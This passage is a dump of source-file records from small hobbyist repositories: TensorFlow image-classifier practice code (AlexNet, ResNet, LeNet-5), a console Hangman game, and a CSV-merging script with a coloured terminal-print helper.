float_image = tf.image.per_image_standardization(reshaped_image)\n float_image.set_shape([height, width, 3])\n read_input.label.set_shape([1])\n min_fraction_queue = 0.4\n min_queue_examples = int(num_example_per_epoch_for_train * min_fraction_queue)\n return _generate_image_label_batch(float_image, read_input.label, min_queue_examples, batch_size, shuffle = False)\n\n" }, { "alpha_fraction": 0.5726743936538696, "alphanum_fraction": 0.6159560680389404, "avg_line_length": 46.267173767089844, "blob_id": "371f2f05c8b7e23a4fbcf6a1805230f2fa63c3a9", "content_id": "1338e46abf6edbdd64bccdf7868d45fcc8a2714a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6192, "license_type": "no_license", "max_line_length": 102, "num_lines": 131, "path": "/cifar10_Alexnet/cifar10.py", "repo_name": "sjwhhhi/tensorflow", "src_encoding": "UTF-8", "text": "import tensorflow as tf\nimport cifar10_input\n\ndata_dir = 'data'\nlearing_rate = 0.1\nbatch_size = 128\nnum_example_per_epoch_for_train = 50000\nmoving_average_decay = 0.9999\nnum_epoch_per_decay = 350\nlearing_rate_decay = 0.1\n\ndef distorted_inputs():\n images, labels = cifar10_input.distorted_input(data_dir=data_dir, batch_size = batch_size)\n return images, labels\n\ndef _variable_on_gpu(name, shape, initializer):\n with tf.device('/gpu:0'):\n dtype = tf.float32\n var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype)\n return var\n\n\ndef _variable_with_weight_decay(name, shape, stddev, wd):\n dtype = tf.float32\n var = _variable_on_gpu(name, shape, tf.truncated_normal_initializer(stddev=stddev, dtype=dtype))\n if wd is not None:\n weight_decay = tf.multiply(tf.nn.l2_loss(var), wd, name='weight_loss')\n tf.add_to_collection('losses', weight_decay)\n return var\n\ndef inference(data, train = False):\n #conv1\n with tf.variable_scope('conv1') as scope:\n kernel = _variable_with_weight_decay('weights', shape = [5,5,3,96], stddev = 5e-2, wd = None)\n conv = tf.nn.conv2d(data, kernel, [1,4,4,1], padding='SAME')\n bias = _variable_on_gpu('bias', [96], tf.constant_initializer(0.0))\n pre_activation = tf.nn.bias_add(conv, bias)\n conv1 = tf.nn.relu(pre_activation, name =scope.name)\n pool1 = tf.nn.max_pool(conv1, ksize=[1,3,3,1], strides=[1,2,2,1], padding='SAME', name = 'pool1')\n\n #conv2\n with tf.variable_scope('conv2') as scope:\n kernel = _variable_with_weight_decay('weights', shape=[5,5,96,256], stddev= 5e-2, wd=None)\n conv = tf.nn.conv2d(pool1, kernel, [1, 1, 1, 1], padding='SAME')\n bias = _variable_on_gpu('bias', [256], tf.constant_initializer(0.1))\n pre_activation = tf.nn.bias_add(conv, bias)\n conv2 = tf.nn.relu(pre_activation, name = scope.name)\n pool2 = tf.nn.max_pool(conv2, ksize=[1,3,3,1], strides=[1,2,2,1], padding='VALID', name='pool2')\n\n #conv3\n with tf.variable_scope('conv3') as scope:\n kernel = _variable_with_weight_decay('weights', shape = [3,3,256,384], stddev = 5e-2, wd=None)\n conv = tf.nn.conv2d(pool2, kernel, [1,1,1,1], padding='SAME')\n bias = _variable_on_gpu('bias', [384], tf.constant_initializer(0.1))\n pre_activation = tf.nn.bias_add(conv, bias)\n conv3 = tf.nn.relu(pre_activation, name = scope.name)\n pool3 = tf.nn.max_pool(conv3, ksize=[1,3,3,1], strides=[1,2,2,1], padding= 'SAME', name='pool3')\n\n #conv4\n with tf.variable_scope('conv4') as scope:\n kernel = _variable_with_weight_decay('weights', shape = [3,3,384,384], stddev = 5e-2, wd=None)\n conv = tf.nn.conv2d(pool3, kernel, [1,1,1,1], padding='SAME')\n bias = _variable_on_gpu('bias', [384], tf.constant_initializer(0.1))\n pre_activation = tf.nn.bias_add(conv, bias)\n conv4 = tf.nn.relu(pre_activation, name = scope.name)\n pool4 = tf.nn.max_pool(conv4, ksize=[1,3,3,1], strides=[1,2,2,1], padding= 'SAME', name='pool4')\n\n #conv5\n with tf.variable_scope('conv5') as scope:\n kernel = _variable_with_weight_decay('weights', shape = [3,3,384,256], stddev = 5e-2, wd=None)\n conv = tf.nn.conv2d(pool4, kernel, [1,1,1,1], padding='SAME')\n bias = _variable_on_gpu('bias', [256], tf.constant_initializer(0.1))\n pre_activation = tf.nn.bias_add(conv, bias)\n conv5 = tf.nn.relu(pre_activation, name = scope.name)\n pool5 = tf.nn.max_pool(conv5, ksize=[1,3,3,1], strides=[1,2,2,1], padding= 'SAME', name='pool5')\n\n #fc\n with tf.variable_scope('fc1') as scope:\n reshape = tf.reshape(pool5, [data.get_shape().as_list()[0], -1])\n dim = reshape.get_shape()[1].value\n kernel = _variable_with_weight_decay('weights', shape = [dim, 384],\n stddev=0.04, wd=0.004)\n bias = _variable_on_gpu('bias', [384], tf.constant_initializer(0.1))\n fc1 = tf.nn.relu(tf.matmul(reshape, kernel)+bias, name=scope.name)\n if train == True:\n drop1 = tf.nn.dropout(fc1, keep_prob=0.5, name='dropout')\n else:\n drop1 = tf.nn.dropout(fc1, keep_prob = 1, name='dropout')\n #fc2\n with tf.variable_scope('fc2') as scope:\n kernel = _variable_with_weight_decay('weights', shape = [384, 192],\n stddev=0.04, wd=0.004)\n bias = _variable_on_gpu('bias', [192], tf.constant_initializer(0.1))\n fc2 = tf.nn.relu(tf.matmul(drop1, kernel) + bias, name=scope.name)\n\n #softmax\n with tf.variable_scope('softmax_linear') as scope:\n kernel = _variable_with_weight_decay('weights', [192, 10],\n stddev=0.04, wd= None)\n bias = _variable_on_gpu('bias', [10], tf.constant_initializer(0.1))\n softmax_linear = tf.add(tf.matmul(fc2, kernel), bias, name=scope.name)\n softmax = tf.nn.softmax(softmax_linear, name='softmax')\n return softmax\n\ndef loss(logits, labels):\n labels = tf.cast(labels, tf.int64)\n cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=labels, logits=logits, name='cross_entropy_per_example')\n cross_entropy_mean = tf.reduce_mean(cross_entropy, name='cross_entropy')\n tf.add_to_collection('losses', cross_entropy_mean)\n tf.summary.scalar('losses', cross_entropy_mean)\n return tf.add_n(tf.get_collection('losses'), name='total_loss')\n\n\ndef accuracy(logits, labels):\n correct_pred = tf.equal(tf.argmax(logits, 1), tf.argmax(labels, 1))\n acc = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n tf.summary.scalar('accuracy', acc)\n return acc\n\ndef train(loss, global_step):\n num_batch = num_example_per_epoch_for_train / batch_size\n decay_step = int(num_batch*num_epoch_per_decay)\n lr = tf.train.exponential_decay(learing_rate,\n global_step,\n decay_step,\n learing_rate_decay,\n staircase=True)\n tf.summary.scalar('learning_rate', lr)\n train_step = tf.train.AdamOptimizer(lr).minimize(loss=loss, global_step=global_step)\n return train_step\n" }, { "alpha_fraction": 0.5895346999168396, "alphanum_fraction": 0.6377191543579102, "avg_line_length": 45.42948532104492, "blob_id": "103b573ae5715a8a6e0fc915cc882aa99c6bb8a0", "content_id": "9cca9308640a548987b15ee182a3f69efeb6fa02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7243, "license_type": "no_license", "max_line_length": 113, "num_lines": 156, "path": "/resnet50/resnet.py", "repo_name": "sjwhhhi/tensorflow", "src_encoding": "UTF-8", "text": "import tensorflow as tf\nimport cifar10_input\n\ndata_dir = 'data'\nlearing_rate = 0.1\nbatch_size = 64\nnum_example_per_epoch_for_train = 50000\nmoving_average_decay = 0.9999\nnum_epoch_per_decay = 350\nlearing_rate_decay = 0.1\n\ndef distorted_inputs():\n images, labels = cifar10_input.distorted_input(data_dir=data_dir, batch_size = batch_size)\n return images, labels\n\ndef _get_variable(name, shape, initializer, wd):\n dtype = tf.float32\n if wd>0:\n regularizer = tf.contrib.layers.l2_regularizer(wd)\n else:\n regularizer = None\n return tf.get_variable(name, shape=shape, initializer=initializer, dtype=dtype, regularizer=regularizer)\n\ndef conv(x, ksize, filter_num, stride, padding = 'SAME'):\n filter_in = x.get_shape()[-1]\n shape = [ksize, ksize, filter_in, filter_num]\n weight = _get_variable('weights',\n shape=shape,\n initializer=tf.truncated_normal_initializer(stddev=0.1),\n wd=0.00004)\n return tf.nn.conv2d(x, weight, [1, stride, stride, 1], padding = padding)\n\ndef maxpool(x, ksize = 2, strides = 2, padding = 'SAME'):\n return tf.nn.max_pool(x, ksize = [1, ksize, ksize, 1], strides = [1, strides, strides, 1], padding = padding)\n\ndef avgpool(x, ksize = 2, strides = 2, padding = 'SAME'):\n return tf.nn.avg_pool(x, ksize = [1, ksize, ksize, 1], strides = [1, strides, strides, 1], padding = padding)\n\ndef fc(x, fc_out):\n fc_in = x.get_shape()[1]\n shape = [fc_in, fc_out]\n weight = _get_variable('weights',\n shape=shape,\n initializer=tf.truncated_normal_initializer(stddev=0.01),\n wd=0.00004)\n bias = _get_variable('bias',\n shape= [fc_out],\n initializer=tf.constant_initializer(0.0),\n wd = None)\n y = tf.nn.bias_add(tf.matmul(x, weight), bias)\n return y\n\ndef bn(x, is_training):\n shape = x.get_shape()\n pop_mean = tf.get_variable('mean', shape, initializer = tf.constant_initializer(0.0), trainable=False)\n pop_var = tf.get_variable('variance', shape, initializer=tf.constant_initializer(1.0), trainable=False)\n offset = tf.get_variable('beta', shape, initializer=tf.constant_initializer(0.0))\n scale = tf.get_variable('scale', shape, initializer=tf.constant_initializer(1.0))\n epsilon = 1e-4\n decay = 0.999\n\n if is_training:\n batch_mean, batch_var = tf.nn.moments(x, [0])\n train_mean = tf.assign(pop_mean, pop_mean * decay + batch_mean * (1 - decay))\n train_var = tf.assign(pop_var, pop_var * decay + batch_var * (1 - decay))\n with tf.control_dependencies([train_mean, train_var]):\n output = tf.nn.batch_normalization(x, batch_mean, batch_var, offset, scale, epsilon)\n else:\n output = tf.nn.batch_normalization(x, pop_mean, pop_var, offset, scale, epsilon)\n return output\n\ndef identity_block(input_layer, output_num, is_training = True):\n shortcut = input_layer\n conv1 = conv(input_layer, ksize=3, filter_num=output_num, stride=1, padding='SAME')\n bn1 = bn(conv1, is_training=is_training)\n relu1 = tf.nn.relu(bn1)\n conv2 = conv(relu1, ksize=3, filter_num=output_num, stride=1, padding='SAME')\n bn2 = bn(conv2, is_training=is_training)\n relu2 = tf.nn.relu(bn2)\n conv3 = conv(relu2, ksize=3, filter_num=output_num, stride=1, padding='SAME')\n bn3 = bn(conv3, is_training=is_training)\n output = shortcut + bn3\n output_act = tf.nn.relu(output)\n return output_act\n\n\ndef con_block(input_layer, output_num1, output_num2, output_num3, is_training = True):\n shortcut = input_layer\n conv1 = conv(input_layer, ksize=1, filter_num=output_num1, stride=1, padding='SAME')\n bn1 = bn(conv1, is_training=is_training)\n relu1 = tf.nn.relu(bn1)\n conv2 = conv(relu1, ksize=3, filter_num=output_num2, stride=1, padding='SAME')\n bn2 = bn(conv2, is_training=is_training)\n relu2 = tf.nn.relu(bn2)\n conv3 = conv(relu2, ksize=1, filter_num=output_num3, stride=1, padding='SAME')\n bn3 = bn(conv3, is_training=is_training)\n shortcut_conv = conv(shortcut, ksize=1, filter_num = output_num3, stride=1, padding='SAME')\n shortcut_bn = bn(shortcut_conv, is_training=is_training)\n output = shortcut_bn + bn3\n output_act = tf.nn.relu(output)\n return output_act\n\ndef inference(data, is_training = True):\n with tf.variable_scope('conv1'):\n conv_data = conv(data, ksize=7, filter_num=64, stride=1, padding='SAME')\n max1 = maxpool(conv_data, ksize=3, strides=2, padding='SAME')\n with tf.variable_scope('block1'):\n block1 = con_block(max1, 64, 64, 256, is_training=is_training)\n block2 = con_block(block1, 64, 64, 256, is_training=is_training)\n block3 = con_block(block2, 64, 64, 256,is_training=is_training)\n with tf.variable_scope('block2'):\n block4 = con_block(block3, 128, 128, 512, is_training=is_training)\n block5 = con_block(block4, 128, 128, 512, is_training=is_training)\n block6 = con_block(block5, 128, 128, 512, is_training=is_training)\n block7 = con_block(block6, 128, 128, 512, is_training=is_training)\n with tf.variable_scope('block3'):\n block8 = con_block(block7, 256, 256, 1024, is_training=is_training)\n block9 = con_block(block8, 256, 256, 1024, is_training=is_training)\n block10 = con_block(block9, 256, 256, 1024, is_training=is_training)\n block11 = con_block(block10, 256, 256, 1024, is_training=is_training)\n block12 = con_block(block11, 256, 256, 1024, is_training=is_training)\n block13 = con_block(block12, 256, 256, 1024, is_training=is_training)\n with tf.variable_scope('block4'):\n block14 = con_block(block13, 512, 512, 2048, is_training=is_training)\n block15 = con_block(block14, 512, 512, 2048, is_training=is_training)\n block16 = con_block(block15, 512, 512, 2048, is_training=is_training)\n avg = avgpool(block16, ksize=7, strides=2, padding='SAME')\n fc1 = fc(avg, 10)\n softmax = tf.nn.softmax(fc1, name= 'softmax')\n return softmax\n\ndef loss(logit, label):\n cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logit, label)\n cross_entropy_mean = tf.reduce_mean(cross_entropy)\n regularization_loss = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)\n losses = cross_entropy_mean + regularization_loss\n tf.summary.scalar('losses', losses)\n return losses\n\ndef accuracy(logits, labels):\n correct_pred = tf.equal(tf.argmax(logits, 1), tf.argmax(labels, 1))\n acc = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n tf.summary.scalar('accuracy', acc)\n return acc\n\ndef train(loss, global_step):\n num_batch = num_example_per_epoch_for_train / batch_size\n decay_step = int(num_batch*num_epoch_per_decay)\n lr = tf.train.exponential_decay(learing_rate,\n global_step,\n decay_step,\n learing_rate_decay,\n staircase=True)\n tf.summary.scalar('learning_rate', lr)\n train_step = tf.train.AdamOptimizer(lr).minimize(loss=loss, global_step=global_step)\n return train_step\n" }, { "alpha_fraction": 0.6276391744613647, "alphanum_fraction": 0.6295585632324219, "avg_line_length": 28, "blob_id": "41bfb219a75cb7b372e4d208e79a0d26f8a16438", "content_id": "ab3b49e863d53bfdd8d247c1d687ed387d164c8d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 521, "license_type": "no_license", "max_line_length": 57, "num_lines": 18, "path": "/depth_train/csv_input.py", "repo_name": "sjwhhhi/tensorflow", "src_encoding": "UTF-8", "text": "import tensorflow as tf\nimport models\nimport cv2\nimport random\nimport glob, os\n\nfs = glob.glob(os.path.join('data_web', '*.jpg'))\ntrains = []\nfor i in range(len(fs)):\n image_name = os.path.join(\"data_web\", \"%d.jpg\" % (i))\n depth_name = os.path.join(\"data_web\", \"%d.png\" % (i))\n trains.append((image_name, depth_name))\nrandom.shuffle(trains)\n\nwith open('train_web.csv', 'w') as output:\n for (image_name, depth_name) in trains:\n output.write(\"%s,%s\" % (image_name, depth_name))\n output.write(\"\\n\")" }, { "alpha_fraction": 0.5762457847595215, "alphanum_fraction": 0.6290745735168457, "avg_line_length": 33.675323486328125, "blob_id": "1b85511f45c3b2c92a277d7a8beb4820d10064be", "content_id": "45a42cc318f21707775247ba936de84f5a25089f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2669, "license_type": "no_license", "max_line_length": 147, "num_lines": 77, "path": "/LeNet5/Lenet5.py", "repo_name": "sjwhhhi/tensorflow", "src_encoding": "UTF-8", "text": "import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nmnist = input_data.read_data_sets('mnist', one_hot = True)\n\ndef weight_varibale(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\ndef bias_variable(shape):\n initial = tf.constant(0.1, shape = shape)\n return tf.Variable(initial)\n\ndef conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\ndef maxpool(x):\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n\ndef accuracy(v_x, v_y):\n global prediction\n pred = sess.run(prediction, feed_dict={x_data: v_x, keep_prob:1})\n correct = tf.equal(tf.argmax(pred, 1), tf.argmax(v_y, 1))\n acc = tf.reduce_mean(tf.cast(correct, tf.float32))\n result = sess.run(acc, feed_dict={x_data: v_x, y_data: v_y, keep_prob:1})\n return result\n\nx_data = tf.placeholder(tf.float32, shape = [None, 784])\ny_data = tf.placeholder(tf.float32, shape = [None, 10])\nkeep_prob = tf.placeholder(tf.float32)\nx_input = tf.reshape(x_data, [-1, 28, 28, 1])\n\n#conv1_layer\nw_conv1 = weight_varibale([5, 5, 1, 32])\nb_conv1 = bias_variable([32])\nconv1 = tf.nn.relu(conv2d(x_input, w_conv1) + b_conv1)\npool1 = maxpool(conv1) #14*14\n\n#conv2_layer\nw_conv2 = weight_varibale([5, 5, 32, 64])\nb_conv2 = bias_variable([64])\nconv2 = tf.nn.relu(conv2d(pool1, w_conv2) + b_conv2)\npool2 = maxpool(conv2) #7*7\n\n#fc1_layer\nw_fc1 = weight_varibale([7*7*64, 1024])\nb_fc1 = bias_variable([1024])\nflat_fc1 = tf.reshape(pool2,[-1, 7*7*64])\nrelu_fc1 = tf.nn.relu(tf.matmul(flat_fc1, w_fc1) + b_fc1)\ndropout = tf.nn.dropout(relu_fc1, keep_prob)\n\n#fc2_layer\nw_fc2 = weight_varibale([1024, 10])\nb_fc2 = bias_variable([10])\nprediction = tf.nn.softmax(tf.matmul(dropout, w_fc2) + b_fc2)\n\n#loss\ncross_entropy = tf.reduce_mean(-tf.reduce_sum(y_data * tf.log(prediction), reduction_indices=[1]))\n#train\ntrain = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\n\ninit = tf.global_variables_initializer()\nsaver = tf.train.Saver()\n\nwith tf.Session() as sess:\n sess.run(init)\n for i in range(10001):\n batch_x, batch_y = mnist.train.next_batch(100)\n sess.run(train, feed_dict={x_data: batch_x, y_data: batch_y, keep_prob: 0.5})\n if i%50 == 0:\n print('step = %s, loss = %.3f, accuracy = %.3f' %(i,\n sess.run(cross_entropy, feed_dict={x_data: batch_x, y_data: batch_y, keep_prob:0.5}),\n accuracy(mnist.test.images, mnist.test.labels)))\n\n save_path = saver.save(sess, \"model/lenet.ckpt\")\n\nprint('Model Saved..')" }, { "alpha_fraction": 0.6792452931404114, "alphanum_fraction": 0.74842768907547, "avg_line_length": 18.875, "blob_id": "c5365b2b86b23e96266650b697b7350f4cf75e03", "content_id": "6b2bed04d74b22e959f4adc6e0f0e0ca86657edb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 159, "license_type": "no_license", "max_line_length": 34, "num_lines": 8, "path": "/README.md", "repo_name": "sjwhhhi/tensorflow", "src_encoding": "UTF-8", "text": "Tensorflow Practice\n1. MNIST train (Lenet5)\n2. CIFAR10 train (Alexnet)\n3. CIFAR10 train (Resnet)\n4. NYUv2 (or depth dataset) train \n5. YOLO\n\nAll in tensorflow\n" }, { "alpha_fraction": 0.5760430693626404, "alphanum_fraction": 0.5928667783737183, "avg_line_length": 29.32653045654297, "blob_id": "b298ff8dfb1a3a952aea9da05195cd7e33f0c4a7", "content_id": "b81fcd327f6c04d6ccbc30b63e12471b2c4f76bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1486, "license_type": "no_license", "max_line_length": 67, "num_lines": 49, "path": "/cifar10_Alexnet/cifar10_train.py", "repo_name": "sjwhhhi/tensorflow", "src_encoding": "UTF-8", "text": "import tensorflow as tf\nimport cifar10\nimport os\n\ntrain_dir = 'train'\nmax_step = 100000\n\ndef train():\n with tf.Graph().as_default():\n global_step = tf.train.get_or_create_global_step()\n images, labels = cifar10.distorted_inputs()\n logits = cifar10.inference(images, train = True)\n loss = cifar10.loss(logits, labels)\n accuracy = cifar10.accuracy(logits, labels)\n train_op = cifar10.train(loss, global_step)\n\n class _LoggerHook(tf.train.SessionRunHook):\n\n def begin(self):\n self._step = -1\n\n def before_run(self, run_context):\n self._step += 1\n return tf.train.SessionRunArgs([loss, accuracy])\n\n def after_run(self, run_context, run_values):\n if self._step % 10 == 0:\n loss_value, acc_value = run_values.results\n format_str = ('step %d, loss = %.2f, accuracy = %.2f ')\n print (format_str %(self._step, loss_value, acc_value))\n\n with tf.train.MonitoredTrainingSession(\n checkpoint_dir=train_dir,\n hooks=[tf.train.StopAtStepHook(last_step=max_step),\n tf.train.NanTensorHook(loss),\n _LoggerHook()],\n config=tf.ConfigProto(\n log_device_placement=False)) as mon_sess:\n while not mon_sess.should_stop():\n mon_sess.run(train_op)\n\ndef main(argv=None):\n if not os.path.exists(train_dir):\n os.mkdir(train_dir)\n train()\n\n\nif __name__ == '__main__':\n tf.app.run()\n" } ]
10
GMutovin/hangman
https://github.com/GMutovin/hangman
4151d1f8de586d8edc175dac0715e20ceed5daf6
186900d0ef95542a79ae16d2c3f38b1a0de07118
ff0352076c42775f371a5132d457506f31966d1b
refs/heads/master
2022-12-12T23:01:44.957071
2020-09-15T18:27:37
2020-09-15T18:27:37
295,803,509
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5181876420974731, "alphanum_fraction": 0.5220165848731995, "avg_line_length": 32.36170196533203, "blob_id": "9e3c44c1898197d49f735244c374a38777afa783", "content_id": "fbc60add2ba0d54ba8aa5418920ea91cee18c6f5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1567, "license_type": "permissive", "max_line_length": 117, "num_lines": 47, "path": "/Hangman_game.py", "repo_name": "GMutovin/hangman", "src_encoding": "UTF-8", "text": "print('H A N G M A N')\nuser_choice = input('Type \"play\" to play the game, \"exit\" to quit: ')\n\nimport random\n\nwords_list = ['python', 'java', 'kotlin', 'javascript']\nguess_word = random.choice(words_list)\nguess_word_list = list(\"-\" *(len(guess_word)))\n\ndef game():\n lives = 8\n tries_list = []\n while lives > 0:\n print()\n print(\"\".join(guess_word_list))\n user_try = input(\"Input a letter: \")\n print(lives)\n if \"\".join(guess_word_list) == guess_word:\n print(f\"You guessed the word {guess_word}!\")\n print(\"You survived!\")\n break\n\n if user_try.isascii() and user_try.islower():\n if len(user_try) > 1 or len(user_try) == 0:\n print(\"You should input a single letter\")\n elif user_try in tries_list:\n print(\"You already typed this letter\")\n else:\n if user_try not in set(guess_word):\n lives -= 1\n print(\"No such letter in the word\")\n tries_list.append(user_try)\n else:\n indices = [index for index, letter in enumerate(guess_word) if letter == user_try]\n for d in indices:\n guess_word_list[d] = user_try\n tries_list.append(user_try)\n else:\n print(\"You should input a single letter\" if len(user_try) > 1 else \"It is not an ASCII lowercase letter\")\n else:\n print('You are hanged!')\n\n\nif user_choice == 'play':\n game()\nelse:\n exit()" }, { "alpha_fraction": 0.7200000286102295, "alphanum_fraction": 0.7200000286102295, "avg_line_length": 11.5, "blob_id": "73c0b4719b5cfb48ed99f4d338ba9b84bb055c69", "content_id": "b010f756fcd3f9d31d28b621ca51d8854fe5f84b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 25, "license_type": "permissive", "max_line_length": 14, "num_lines": 2, "path": "/README.md", "repo_name": "GMutovin/hangman", "src_encoding": "UTF-8", "text": "# hangman\nGame \"Hangman\"\n" } ]
2
Mal-Capone/data
https://github.com/Mal-Capone/data
11d6cbf0c36c2ecdfad40c4887ebf4ea89872822
b214ed73425dc7bdeaaac89e47133a7ae628f54d
eb5952c47b5a4b175971d8c6116862df48d3e008
refs/heads/main
2021-06-06T00:10:33.782401
2021-05-07T03:07:24
2021-05-07T03:07:24
136,309,777
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.49513381719589233, "alphanum_fraction": 0.4987834692001343, "avg_line_length": 30.653846740722656, "blob_id": "c801508911802e6cb406bd7ced932cdbf51e2d37", "content_id": "4316d14142b4f41a764295d97448f4da9512ceea", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 822, "license_type": "permissive", "max_line_length": 104, "num_lines": 26, "path": "/main3.py", "repo_name": "Mal-Capone/data", "src_encoding": "UTF-8", "text": "# field names within files\nfrom main2 import get_files\nfrom config import data_dir\nimport csv\nimport json\n\nf = json.loads(open('data/fld.json','r').read())\n\nF\n\ndef fields():\n field_names = []\n for file in get_files(data_dir):\n try:\n with open(file,'r',encoding='latin1',errors='ignore') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n if reader.line_num == 1:\n for c in row:\n col = c.lower().replace(\" \",\"_\")\n if not col == '' and not col.startswith(\"row\") and not col in field_names:\n field_names.append(col)\n print(f\"Finished File {file}\")\n except:\n continue\n return field_names" }, { "alpha_fraction": 0.5417780876159668, "alphanum_fraction": 0.5467914342880249, "avg_line_length": 30.17708396911621, "blob_id": "8525120d7c3509216e7bf4deea47ded205e28a3e", "content_id": "428afb27d54492925e30779413ef30d6fc447e7e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2992, "license_type": "permissive", "max_line_length": 125, "num_lines": 96, "path": "/main2.py", "repo_name": "Mal-Capone/data", "src_encoding": "UTF-8", "text": "import timeit\nimport csv\nimport os\nimport time\nfrom pathlib import Path, PurePath\nfrom dask import dataframe as dd\nfrom tqdm.contrib.concurrent import thread_map\nfrom lib.utils import timeit\nfrom xutils import printer as p\nimport config\nimport json\n\nglobal rows\nglobal file_headers\n\ndata_dir = config.data_dir\n\ndef get_files(base=data_dir):\n flist, dirs = [], []\n ext = ['.csv','.xlsx','.xls']\n for path, subdir, files in os.walk(base):\n for file in files:\n if Path(file).suffix in ext and file not in flist:\n flist.append(str(PurePath(path,file)))\n return flist\n\ndef load_rows(row):\n d = dict.copy(fld)\n try:\n for key in fld.keys():\n for header in file_headers:\n if key.lower().replace(\" \",\"_\") == header.lower().replace(\" \",\"_\"):\n index=file_headers.index(header)\n d[key]=row[index]\n continue\n d['sfx']=fi\n if d['email']:\n return d\n except:\n return None\n return None\n\ndef main():\n global file_headers\n global fi\n _row, _rows = [],[]\n count, total , i = 0, 0, 0\n for file in get_files(data_dir):\n i += 1\n fi = Path(file).name\n if file.endswith(\".csv\"):\n p.info(f\"Processing File {i}/{len(get_files(data_dir))}: {Path(file).name}\")\n with open(file, 'r', encoding='latin1') as csvfile:\n file_headers = csvfile.readlines()[0].lower().split(\",\")\n with open(file, 'r', encoding='latin1') as csvfile:\n file_rows = thread_map(load_rows,[r for r in csv.reader(csvfile) if r], max_workers=20, desc=f'reading data')\n data = [row for row in file_rows if row]\n count = len(data)\n total = total + count\n data_rows.append(data)\n p.ok(f\"Added : {count}/{len(file_rows)} Companies | Total Count: {total} records\")\n\n _row, _rows = [],[]\n _row = [key for key in Company.keys()]\n _rows.append(_row)\n fnum = 0\n dr = [r for r in data_rows if len(r)]\n for lst in dr:\n with open(f'data/test_{fnum}.csv','w',encoding='utf-8',newline='') as csvtt:\n for company in lst:\n _row = [v.strip().lower() if v else '' for k, v in company.items()]\n _rows.append(_row)\n csv.writer(csvtt).writerows(_rows)\n p.ok(f\"File created text_{fnum}.csv ({len(_rows)})\")\n _rows = []\n fnum += 1\n p.ok(f\"Process Complete Total: {len(_rows)}\")\n\n\ndef dump_rows(data):\n with open('data/test.csv', 'w', encoding='utf-8', newline='') as csvf:\n csv.writer(csvf).writerows(data)\n p.ok(\"Done\")\n\nif __name__ == '__main__':\n data_rows = []\n fld = json.loads(open('data/fld.json','r').read())\n fi = ''\n try:\n main()\n except KeyboardInterrupt as keyex:\n dump_rows(data_rows)\n exit(0)\n except Exception:\n dump_rows(data_rows)\n exit(0)" }, { "alpha_fraction": 0.5812696814537048, "alphanum_fraction": 0.5844214558601379, "avg_line_length": 32.149253845214844, "blob_id": "240b797da5b46e0df414ab0e8491334bf75871dc", "content_id": "d0e97dc72feba44179e64ef05df653f00a4ce32f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2221, "license_type": "permissive", "max_line_length": 90, "num_lines": 67, "path": "/xutils/printer.py", "repo_name": "Mal-Capone/data", "src_encoding": "UTF-8", "text": "from colorama import Fore as _c\n\nyellow = _c.LIGHTYELLOW_EX\ngreen = _c.LIGHTGREEN_EX\nblue = _c.LIGHTBLUE_EX\nred = _c.LIGHTRED_EX\ncyan = _c.LIGHTCYAN_EX\nblack = _c.LIGHTBLACK_EX\nRESET = _c.RESET\n\ndef info(print_message, symbol='[i]', color=blue):\n return print(f'{color}{symbol} {print_message}{_c.RESET}')\n\ndef exc(print_message, symbol='[!]', color=red):\n return print(f'{color}{symbol} {print_message}{_c.RESET}')\n\ndef ok(print_message, symbol='[+]', color=green):\n return print(f'{color}{symbol} {print_message}{_c.RESET}')\n\ndef txt(print_message, symbol='\\n\\t', color=cyan):\n return print(f'{color}{symbol} {print_message}{_c.RESET}')\n\ndef cyan(print_message, symbol='[i]', color=cyan):\n return print(f'{color}{symbol} {print_message}{_c.RESET}')\n\ndef blu(print_message, symbol='[i]', color=blue):\n return print(f'{color}{symbol} {print_message}{_c.RESET}')\ndef ask_yesno(question, symbol='[?]', color=_c.LIGHTBLUE_EX):\n question = question.strip(\"?\")\n if input(f'{color}{symbol} {question}? [n/y]:> {_c.RESET}').lower() in ['y','yes','']:\n return True\n else:\n return False\n\ndef ask_int(question, symbol='[?]', color=_c.LIGHTBLUE_EX):\n question = question.strip(\"?\")\n INT=None\n while not type(INT) is int:\n try:\n i = int(input(f\"{color}{symbol} {question}? [0-9]:> {_c.RESET}\"))\n if type(i) is int:\n return i\n except ValueError as ex:\n continue\n\ndef ask_str(question, symbol='[?]', color=_c.LIGHTBLUE_EX):\n question = question.strip(\"?\")\n STR=None\n while not type(STR) is str:\n try:\n i = str(input(f\"{color}{symbol} {question}?:> {_c.RESET}\"))\n if type(i) is str:\n return i\n except ValueError as ex:\n continue\n\ndef title(print_message, width=60, color=_c.LIGHTCYAN_EX):\n s = \"-\" * width\n if not print_message or print_message == '':\n print_message = \"EXAMPLE TITLE\"\n t = print_message.upper()\n start = int((width - len(t)) / 2)\n 